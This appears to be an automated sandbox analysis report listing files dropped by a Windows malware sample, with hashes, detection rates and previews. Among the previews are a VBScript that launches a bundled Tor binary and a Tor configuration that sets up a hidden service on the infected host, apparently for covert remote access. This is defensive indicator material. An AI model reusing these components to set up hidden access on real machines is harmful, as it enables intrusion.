                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):172
                                                                          Entropy (8bit):4.939646411880318
                                                                          Encrypted:false
                                                                          SSDEEP:3:jaPFEm8nByK2qQZnmRdZj4I5xKpRZxHFmGZj4I5xKpRWSsjv20FaPOUC:j6NqEK2dnmR5+Rl5+RBsjv2KUC
                                                                          MD5:DF39E5BEB63BA0DC6A84E29591BFAAA8
                                                                          SHA1:63EFC259EB67D150FAD9699250E383B773144E36
                                                                          SHA-256:FA5B02AD4EF3C6C290883A3173E53C46B024F7928835B1B53916260B156EE602
                                                                          SHA-512:4C649E2AD35AD7119B124C8D5F78E9194E5DC4AE53DC0FFFE773A28C31C6145A1A7AD2D24B3ACE1368EF1165E7CECB701D14A873263F8DDBAEB478A345C743F7
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:Set WshShell = CreateObject("WScript.Shell") ..WshShell.Run("""C:\Program Files (x86)\Tor\tor-real.exe"" -f ""C:\Program Files (x86)\Tor\torrc"""),1..Set WshShell = Nothing
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):132
                                                                          Entropy (8bit):4.979194871191635
                                                                          Encrypted:false
                                                                          SSDEEP:3:V9cbKCj4I5xKpCBj3ZVcbKCj4I5xKpCbvtGIRzIWQnhNiFX:0R5+QncR5+SFHRE3hNiFX
                                                                          MD5:1EF93CDA02A0C4AD92978542D2BCCCA9
                                                                          SHA1:2147257895E77B7DB0E040118E3D025ECE791212
                                                                          SHA-256:422CDB7373F4A7A568FF9EE7147A0B0E608066A573CA6A7531D2BD1B40844811
                                                                          SHA-512:8554B4306CBD0960CBE6CF720A4EDCC50B6AF5FDE08E44160BFBC411F3C0BCFD239FAEF3C1EC913C24A286C01ED4EEB88C8D25B3B3781A7B9D7F4ED6FB92AF65
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:GeoIPFile C:\Program Files (x86)\Tor\geoip..GeoIPv6File C:\Program Files (x86)\Tor\geoip6..SocksPort localhost:9050..#ExitNodes {us}
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):228
                                                                          Entropy (8bit):4.951833307481278
                                                                          Encrypted:false
                                                                          SSDEEP:6:CMR3vAiI923SyypBEiqnTNu5P923SyypNKOunTy9unTMvv:CQ3YEtypyiH54typjL
                                                                          MD5:9CC2AD4256EEC5414906C439665F6A37
                                                                          SHA1:CAAF6CD84BC3535616A009D33D443598AE986561
                                                                          SHA-256:C412382BCDADA2048B770C31672E861967299B5DDA7A9A4362B4BAD407B3BC89
                                                                          SHA-512:8311ADF368D08DBD1DA1AE6968BB5F822BB7C1EC47A1FC706F9F01665841DDC120934264B34A6DFE34E4A4FA04F59674AA05E1C767765C5C7B3E657D2821B806
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:SOCKSPort 2790..ControlPort 2791..DataDirectory C:\Users\user\AppData\Local\77rh3rhsc7\tor\data..HiddenServiceDir C:\Users\user\AppData\Local\77rh3rhsc7\tor\host..HiddenServicePort 80 127.0.0.1:2789..HiddenServiceVersion 3..
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):124416
                                                                          Entropy (8bit):6.479923939252401
                                                                          Encrypted:false
                                                                          SSDEEP:3072:HW7e1dL7Om0iXQmWfBoUSIgTBfHJNj9jjjjjjKeDEcz:HWCdLd4fBoUSIgTBxNj9jjjjjjKeDEc
                                                                          MD5:6F98DA9E33CD6F3DD60950413D3638AC
                                                                          SHA1:E630BDF8CEBC165AA81464FF20C1D55272D05675
                                                                          SHA-256:219D9D5BF0DE4C2251439C89DD5F2959EE582E7F9F7D5FF66A29C88753A3A773
                                                                          SHA-512:2983FAAF7F47A8F79A38122AA617E65E7DEDDD19BA9A98B62ACF17B48E5308099B852F21AAF8CA6FE11E2CC76C36EED7FFA3307877D4E67B1659FE6E4475205C
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Process:C:\Users\user\AppData\Local\Temp\ffmaba.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1433
                                                                          Entropy (8bit):5.341418830574733
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84qpsXE4qdKm:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HA
                                                                          MD5:F30AB993BAB25C1E42ED5545A67CD464
                                                                          SHA1:CE2526AA315AAC8E1569ECDF6AF450A1062B4225
                                                                          SHA-256:E7C5888083E14FC76A59FBAD2DA592446F6BDEC7DE18118B9A5658FBEB4A9B49
                                                                          SHA-512:59887E6ED6C67D36207DF995259A044E809296A5BD78B82DD3B00CB13D0811C3FEE021C763220572711005DECA576E3E1D65C79017AA07902C59EE1B536C46C9
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                          Process:C:\Users\user\Desktop\yt7dW9nyJK.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1216
                                                                          Entropy (8bit):5.34331486778365
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                          Malicious:true
                                                                          Reputation:unknown
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):2232
                                                                          Entropy (8bit):5.37966389835059
                                                                          Encrypted:false
                                                                          SSDEEP:48:6WSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:6LHxvCsIfA2KRHmOugw1s
                                                                          MD5:687D6440F7E1633CD0EFEEC836AB3BE3
                                                                          SHA1:0518ECC6200654B85E2A8567A6B451F39DBB4280
                                                                          SHA-256:D6281187F98CE3C9BA99BD54CE833B8B01C2DE2A7FBB40089D462F2AB3FB1C40
                                                                          SHA-512:D05E8ED5D774AE49169D38AD65E66C0014508F5A230E163A4529C80A6867A9AD474A6FB327515B3FE3318C4BEC1C8818AB39208BD229615B3C23517BCCE7AE41
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                          Process:C:\Users\user\AppData\Local\Temp\ffmaba.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):511496
                                                                          Entropy (8bit):7.963050096245282
                                                                          Encrypted:false
                                                                          SSDEEP:12288:JSoFwZbQp5MKHYRAnRx8S18Bjbgot1C2kR:coFzaeJX8Rt1O
                                                                          MD5:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          SHA1:314B707CE3A9043E2C219B6F1DE883C572089EA8
                                                                          SHA-256:459C1822B23497D81044D18CE0936F876B37A478CE847140EC69A8DD58C0A1E8
                                                                          SHA-512:F487E7EEE98B3B97E43C7C9759BC50D2341AB5622AF80ED4A06ED32FEE9A221BA1E968E95213B2B44FB5D72B1AF618B7B1BA0A77BE81CB2A65FF99979D7C2ED1
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 46%
                                                                          Reputation:unknown
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Users\user\Desktop\yt7dW9nyJK.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):511496
                                                                          Entropy (8bit):7.963050096245282
                                                                          Encrypted:false
                                                                          SSDEEP:12288:JSoFwZbQp5MKHYRAnRx8S18Bjbgot1C2kR:coFzaeJX8Rt1O
                                                                          MD5:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          SHA1:314B707CE3A9043E2C219B6F1DE883C572089EA8
                                                                          SHA-256:459C1822B23497D81044D18CE0936F876B37A478CE847140EC69A8DD58C0A1E8
                                                                          SHA-512:F487E7EEE98B3B97E43C7C9759BC50D2341AB5622AF80ED4A06ED32FEE9A221BA1E968E95213B2B44FB5D72B1AF618B7B1BA0A77BE81CB2A65FF99979D7C2ED1
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 46%
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0..|.............. ........@.. ....................................@.................................t...O........................6........................................................... ............... ..H............text....x... ...|.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                          Category:dropped
                                                                          Size (bytes):6710958
                                                                          Entropy (8bit):7.998536518881409
                                                                          Encrypted:true
                                                                          SSDEEP:98304:bOpzhgWh6LHZbUoR3eO+pZBq1OkrWo+oodFbQVWnrb3WQ4bW3U7yyf3xqq2/pB/u:Kpzp6/t09yNKFmurnz3fgRk57MV
                                                                          MD5:F4E79137AB4B7C0AF7F410F87561BF23
                                                                          SHA1:9412D1C5CE21F407EDE88144C45E098216271DB8
                                                                          SHA-256:044940B15C5DD4EB47C58BBD1F58F81B431CE82B6501F8744C9AE3EFB26C7AE7
                                                                          SHA-512:B1487FF19CC0261DD2C66CD57B0B16AC7DB9A0C2F4F50956B82AD84B5420A9A77AE2B126F6D39CE1731E0055D1F77EACD7C5EA2022E7F2620BB2E9CD4030EC4E
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with very long lines (307), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4090
                                                                          Entropy (8bit):5.1101770060159515
                                                                          Encrypted:false
                                                                          SSDEEP:96:xXx46ioKoQ15S/5cqXhNol2z75gc/5WoKW+B:xy6H/Q15S/5DxOl2yaaB
                                                                          MD5:674FE6AD8B3B1D418EDE68F38DDBE4F5
                                                                          SHA1:5FE450FD580AF12E714A01215A22A989C591DA5A
                                                                          SHA-256:797C312D226D3C0FE766428CE4F982CBA6E9C738D6616890913C7DF0998D048D
